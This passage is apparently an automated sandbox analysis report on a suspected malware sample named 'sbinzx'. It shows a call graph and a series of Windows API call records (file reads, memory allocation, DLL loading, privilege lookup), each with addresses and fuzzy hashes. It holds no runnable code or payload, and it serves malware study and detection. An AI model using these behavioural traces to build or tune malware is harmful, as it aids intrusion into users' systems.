LdrLoadDll 81346->81390 81389 419c90 LdrLoadDll 81348->81389 81349 40ae9d 81349->80872 81351 40ae7c 81351->80872 81353 40f490 3 API calls 81352->81353 81354 4143b6 81353->81354 81354->80874 81391 4087a0 81355->81391 81358 408a9d 81358->80876 81359 4087a0 20 API calls 81360 408a8a 81359->81360 81360->81358 81409 40f700 11 API calls 81360->81409 81363 41af20 LdrLoadDll 81362->81363 81364 41a4dc 81363->81364 81528 1b62e80 LdrInitializeThunk 81364->81528 81365 40c312 81367 40f490 81365->81367 81368 40f4ad 81367->81368 81529 419f80 81368->81529 81371 40f4f5 81371->80880 81372 419fd0 2 API calls 81373 40f51e 81372->81373 81373->80880 81375 419fec 81374->81375 81376 41af20 LdrLoadDll 81374->81376 81535 1b62d10 LdrInitializeThunk 81375->81535 81376->81375 81377 40c375 81377->80886 81377->80889 81380 41af20 LdrLoadDll 81379->81380 81381 41a03c 81380->81381 81536 1b62d30 LdrInitializeThunk 81381->81536 81382 40c449 81382->80897 81385 41af20 LdrLoadDll 81384->81385 81386 419dfc 81385->81386 81537 1b62fb0 LdrInitializeThunk 81386->81537 81387 40c49c 81387->80901 81389->81351 81390->81349 81392 407ea0 4 API calls 81391->81392 81395 4087ba 81391->81395 81392->81395 81393 408a49 81393->81358 81393->81359 81394 408a3f 81396 408160 2 API calls 81394->81396 81395->81393 81395->81394 81399 419ec0 3 API calls 81395->81399 81401 41a450 LdrLoadDll NtClose 81395->81401 81404 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81395->81404 81407 419de0 2 API calls 81395->81407 81410 419cd0 81395->81410 81413 4085d0 81395->81413 81425 40f5e0 LdrLoadDll NtClose 81395->81425 81426 419d50 LdrLoadDll 81395->81426 81427 419d80 LdrLoadDll 81395->81427 81428 419e10 LdrLoadDll 81395->81428 81429 4083a0 81395->81429 81445 405f60 LdrLoadDll 81395->81445 81396->81393 81399->81395 81401->81395 81404->81395 81407->81395 81409->81358 81411 419cec 81410->81411 81412 41af20 LdrLoadDll 81410->81412 81411->81395 81412->81411 81414 4085e6 81413->81414 81446 419840 81414->81446 81416 4085ff 81421 408771 81416->81421 81467 4081a0 81416->81467 81418 4086e5 81419 4083a0 11 API calls 81418->81419 81418->81421 81420 408713 81419->81420 81420->81421 81422 419ec0 3 API calls 81420->81422 81421->81395 81423 408748 81422->81423 81423->81421 81424 41a4c0 2 API calls 81423->81424 81424->81421 81425->81395 81426->81395 81427->81395 81428->81395 81430 4083c9 81429->81430 81507 408310 81430->81507 81433 41a4c0 2 API calls 81434 4083dc 81433->81434 81434->81433 81435 408467 81434->81435 81438 408462 81434->81438 81515 40f660 81434->81515 81435->81395 81436 41a450 2 API calls 81437 40849a 81436->81437 81437->81435 81439 419cd0 LdrLoadDll 81437->81439 81438->81436 81440 4084ff 81439->81440 81440->81435 81519 419d10 81440->81519 81442 408563 81442->81435 81443 414a40 8 API calls 81442->81443 81444 4085b8 81443->81444 81444->81395 81445->81395 81447 41bf50 2 API calls 81446->81447 81448 419857 81447->81448 81474 409310 81448->81474 81450 419872 81451 4198b0 81450->81451 81452 419899 81450->81452 81455 41bd00 2 API calls 81451->81455 81453 41bd80 2 API calls 81452->81453 81454 4198a6 81453->81454 81454->81416 81456 4198ea 81455->81456 81457 41bd00 2 API calls 81456->81457 81458 419903 81457->81458 81464 419ba4 81458->81464 81480 41bd40 81458->81480 81461 419b90 81462 41bd80 2 API calls 81461->81462 81463 419b9a 81462->81463 81463->81416 81465 41bd80 2 API calls 81464->81465 81466 419bf9 81465->81466 81466->81416 81468 40829f 81467->81468 81469 4081b5 81467->81469 81468->81418 81469->81468 81470 414a40 8 API calls 81469->81470 81471 408222 81470->81471 81472 41bd80 2 API calls 81471->81472 81473 408249 81471->81473 81472->81473 81473->81418 81475 409335 81474->81475 81476 409368 81475->81476 81477 40ace0 LdrLoadDll 81475->81477 81479 40938d 81476->81479 81483 40cf10 81476->81483 81477->81476 81479->81450 81501 41a540 81480->81501 81484 40cf3c 81483->81484 81485 41a1a0 LdrLoadDll 81484->81485 81486 40cf55 81485->81486 81487 40cf5c 81486->81487 81494 41a1e0 81486->81494 81487->81479 81491 40cf97 81492 41a450 2 API calls 81491->81492 81493 40cfba 81492->81493 81493->81479 81495 41a1fc 81494->81495 81496 41af20 LdrLoadDll 81494->81496 81500 1b62ca0 LdrInitializeThunk 81495->81500 81496->81495 81497 40cf7f 81497->81487 81499 41a7d0 LdrLoadDll 81497->81499 81499->81491 81500->81497 81502 41af20 LdrLoadDll 81501->81502 81503 41a55c 81502->81503 81506 1b62f90 LdrInitializeThunk 81503->81506 81504 419b89 81504->81461 81504->81464 81506->81504 81508 408328 81507->81508 81509 40ace0 LdrLoadDll 81508->81509 81510 408343 81509->81510 81511 414e40 LdrLoadDll 81510->81511 81512 408353 81511->81512 81513 40835c PostThreadMessageW 81512->81513 81514 408370 81512->81514 81513->81514 81514->81434 81516 40f673 81515->81516 81522 419e50 81516->81522 81520 419d2c 81519->81520 81521 41af20 LdrLoadDll 81519->81521 81520->81442 81521->81520 81523 41af20 LdrLoadDll 81522->81523 81524 419e6c 81523->81524 81527 1b62dd0 LdrInitializeThunk 81524->81527 81525 40f69e 81525->81434 81527->81525 81528->81365 81530 41af20 LdrLoadDll 81529->81530 81531 419f9c 81530->81531 81534 1b62f30 LdrInitializeThunk 81531->81534 81532 40f4ee 81532->81371 81532->81372 81534->81532 81535->81377 81536->81382 81537->81387 81538 1b62bf0 LdrInitializeThunk 81539 1b6096e 81540 1b609a8 ___swprintf_l 81539->81540 81542 1b60ed3 __startOneArgErrorHandling 81540->81542 81567 1b62df0 LdrInitializeThunk 81540->81567 81543 1b60a15 __except_handler4 81543->81542 81568 1b62df0 LdrInitializeThunk 81543->81568 81545 1b60a6c 81545->81542 81569 1b60f04 LdrInitializeThunk __startOneArgErrorHandling __except_handler4 81545->81569 81547 1b60a81 81547->81542 81548 1b60a8b GetPEB 81547->81548 81549 1b60ac5 81548->81549 81549->81542 81570 1b6171c 81549->81570 81551 1b60ae9 81552 1b99837 81551->81552 81556 1b60b03 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 81551->81556 81563 1b60e0f ___swprintf_l 81551->81563 81577 1b62ad0 LdrInitializeThunk 81552->81577 81553 1b60ec2 GetPEB 81553->81542 81557 1b60bbb GetPEB 81556->81557 81559 1b60ddb __vswprintf 81556->81559 81557->81559 81561 1b60be7 __vswprintf 81557->81561 81558 1b60f02 81558->81553 81580 1b60fa6 GetPEB GetPEB LdrInitializeThunk 81559->81580 81561->81559 81578 1b613c5 23 API calls 2 library calls 81561->81578 81563->81553 81563->81558 81564 1b99b56 81563->81564 81576 1b62b60 LdrInitializeThunk 81563->81576 81565 1b60ce6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 81565->81559 81579 1b610ee 7 API calls 2 library calls 81565->81579 81567->81543 81568->81545 81569->81547 81571 1b6175b __except_handler4 81570->81571 81575 1b617e5 81571->81575 81581 1b62fe0 LdrInitializeThunk 81571->81581 81574 1b61830 __startOneArgErrorHandling 81574->81551 81582 1b33c70 GetPEB 81575->81582 81576->81558 81577->81563 81578->81565 81579->81559 81580->81563 81581->81575 81582->81574

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileRead
                                                                                • String ID: bMA$bMA
                                                                                • API String ID: 752142053-1998556560
                                                                                • Opcode ID: 4555b8db24263beb396bddce414187ec1e3ee0d2ccf8c281040a10ff5ee7e2c3
                                                                                • Instruction ID: c5433787d6f9d94ca67f4c19549f6707bba6345fab498e1b4a6d86f392923fb9
                                                                                • Opcode Fuzzy Hash: 4555b8db24263beb396bddce414187ec1e3ee0d2ccf8c281040a10ff5ee7e2c3
                                                                                • Instruction Fuzzy Hash: A4112DB6204108BFDB14DF98DC84DEB77ADEF8C310B14865DFA5C87205C634E8518BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 8 41a3d0-41a419 call 41af20 NtReadFile
                                                                                APIs
                                                                                • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: !JA$bMA$bMA
                                                                                • API String ID: 2738559852-4222312340
                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 323 41a320-41a336 324 41a33c-41a371 NtCreateFile 323->324 325 41a337 call 41af20 323->325 325->324
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 326 41a31b-41a371 call 41af20 NtCreateFile
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 10e2313bae08c4ea56f4ec5b6a294a75bc6ffca9dc3441b5507330e58ac5edb4
                                                                                • Instruction ID: d6a5240eb07b507b895d18ca407b66409a8d8d5b7c24692f6b929a3d25f7b8d7
                                                                                • Opcode Fuzzy Hash: 10e2313bae08c4ea56f4ec5b6a294a75bc6ffca9dc3441b5507330e58ac5edb4
                                                                                • Instruction Fuzzy Hash: BAF0B2B6205108AFDB08CF88DC95EEB77AEEF8C314F158249BA0997255C630E811CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 329 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 9ffc64b18df28b0ef6e7fe51342331a4b0ad2a26d2f95324d3bee179bf33f0a4
                                                                                • Instruction ID: 2ef9bb699a7018c9cc7bc6d29dae641287fc63af95c3dd5d89fb187e99bc2b81
                                                                                • Opcode Fuzzy Hash: 9ffc64b18df28b0ef6e7fe51342331a4b0ad2a26d2f95324d3bee179bf33f0a4
                                                                                • Instruction Fuzzy Hash: 5AF01CB2200108BFDB14DF99DC81EEB77ADEF88354F158249FE0997241C634E811CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 332 41a500-41a516 333 41a51c-41a53d NtAllocateVirtualMemory 332->333 334 41a517 call 41af20 332->334 334->333
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 11 41a622-41a623 12 41a625-41a626 11->12 13 41a605-41a607 call 41af20 12->13 14 41a628-41a62b 12->14 19 41a60c-41a621 RtlAllocateHeap 13->19 15 41a600-41a604 14->15 16 41a62d-41a62e 14->16 15->13 16->12 18 41a630-41a647 call 41af20 16->18 21 41a64c-41a661 RtlFreeHeap 18->21
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateFree
                                                                                • String ID: &EA
                                                                                • API String ID: 2488874121-1330915590
                                                                                • Opcode ID: 4f5adb6c090d9f761aca899f227854bbc978f19403b4f5599b7088d3ffef287d
                                                                                • Instruction ID: b25da64d1c7be17a64bc07fb75e183af267272aa4b857870772045b2d45b8ee9
                                                                                • Opcode Fuzzy Hash: 4f5adb6c090d9f761aca899f227854bbc978f19403b4f5599b7088d3ffef287d
                                                                                • Instruction Fuzzy Hash: D9018BB52012146FCB20EF65DC44DEB776CEF84328B05865AF94957282C634EC61CBF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 22 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: &EA
                                                                                • API String ID: 1279760036-1330915590
                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 221 40839c-40839e 222 4083a0-4083f8 call 41be20 call 408310 call 41b710 221->222 223 40833d-40835a call 40ace0 call 414e40 221->223 238 408400-408432 call 40f660 call 41a4c0 222->238 233 40835c-40836e PostThreadMessageW 223->233 234 40838e-408392 223->234 236 408370-40838a call 40a470 233->236 237 40838d 233->237 236->237 237->234 245 408434-40843c 238->245 246 408467-40846f 238->246 247 408456-408460 245->247 248 40843e-408445 245->248 247->238 250 408462-408465 247->250 248->247 249 408447-40844e 248->249 249->247 251 408450-408454 249->251 252 40848d-40849f call 41a450 250->252 251->247 253 408470-40848a call 41bda0 251->253 252->246 257 4084a1-40850c call 419cd0 252->257 253->252 257->246 261 408512-40856e call 419d10 257->261 261->246 264 408574-4085c1 call 41b3b0 call 41b3d0 call 41c090 call 41bda0 call 414a40 261->264
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: b0d367043abb203b0db15c80fa1710186e02a9d286bca5a094bc596f62b81abf
                                                                                • Instruction ID: c642f279ee01c55a5a82685bb0bf4c09ec21e604d3ff80a8152a40c77f4ed0a4
                                                                                • Opcode Fuzzy Hash: b0d367043abb203b0db15c80fa1710186e02a9d286bca5a094bc596f62b81abf
                                                                                • Instruction Fuzzy Hash: FC61E7B0900309AFDB24DF64DD85FEB77E8EB48704F00057EF949A7281EB7469418BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 275 40830b-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 285 40835c-40836e PostThreadMessageW 275->285 286 40838e-408392 275->286 287 408370-40838a call 40a470 285->287 288 40838d 285->288 287->288 288->286
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 00d06d75f3fe86fd0c343dff79e9371933e1209f67ba1a258de8278e0a701324
                                                                                • Instruction ID: 642eaaa3ea69e9df636b6cfdd2fbfc5a9ef5043a268ced20851569b5d2e52d39
                                                                                • Opcode Fuzzy Hash: 00d06d75f3fe86fd0c343dff79e9371933e1209f67ba1a258de8278e0a701324
                                                                                • Instruction Fuzzy Hash: 5C01D871A8031877E720A6958C43FFE772C6B40B54F04411EFF04BA1C1D6F8690546EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 291 408310-40831f 292 408328-40835a call 41c9c0 call 40ace0 call 414e40 291->292 293 408323 call 41be20 291->293 301 40835c-40836e PostThreadMessageW 292->301 302 40838e-408392 292->302 293->292 303 408370-40838a call 40a470 301->303 304 40838d 301->304 303->304 304->302
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 307 40ace0-40ad09 call 41cc10 311 40ad0b-40ad0e 307->311 312 40ad0f-40ad1d call 41d030 307->312 315 40ad2d-40ad3e call 41b460 312->315 316 40ad1f-40ad2a call 41d2b0 312->316 321 40ad40-40ad54 LdrLoadDll 315->321 322 40ad57-40ad5a 315->322 316->315 321->322
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 335 41a782-41a7aa call 41af20 338 41a7af-41a7c4 LookupPrivilegeValueW 335->338
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: 064dabb3c5514f70655747349a56461b80c7b87b22f434a6884cb0fc95efc62c
                                                                                • Instruction ID: d2b59b103d22d13b5f580e1d9e742f69d860d928bdf5620435659320132029ff
                                                                                • Opcode Fuzzy Hash: 064dabb3c5514f70655747349a56461b80c7b87b22f434a6884cb0fc95efc62c
                                                                                • Instruction Fuzzy Hash: 76E065B5200204AFDB20DF65CC80EDB37A9AF85354F158159F949AB691D530A8158BB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
